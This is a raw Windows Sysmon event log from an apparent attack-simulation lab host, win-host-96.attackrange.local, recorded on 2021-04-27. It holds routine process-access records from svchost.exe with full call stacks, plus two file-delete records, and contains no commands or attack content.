12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291917Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291916Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291915Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291914Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291913Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291912Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291911Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291910Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291909Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-1000-00000000BB01}9447116C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291908Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-1000-00000000BB01}944NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\INF\disk.PNFMD5=DEA96D01DBAF350836DF08C0C3A384A8,SHA256=DF92332CBD99294C92B28D1F65D902657CAEF27BB8961D9BB1F3D8B3B2F6EC56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291907Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.476{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D2B4AD6D47121B772713353221EF037,SHA256=9EC5A906D0DFF7D62410160351C7255249472D9021A5C3FFB1090FC256D9D9EF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291906Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291905Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291904Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291903Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291902Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291901Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291900Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291899Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.461{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291898Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.439{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291897Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.439{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291896Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.439{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291895Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.423{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291894Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.423{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291893Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.423{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291892Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 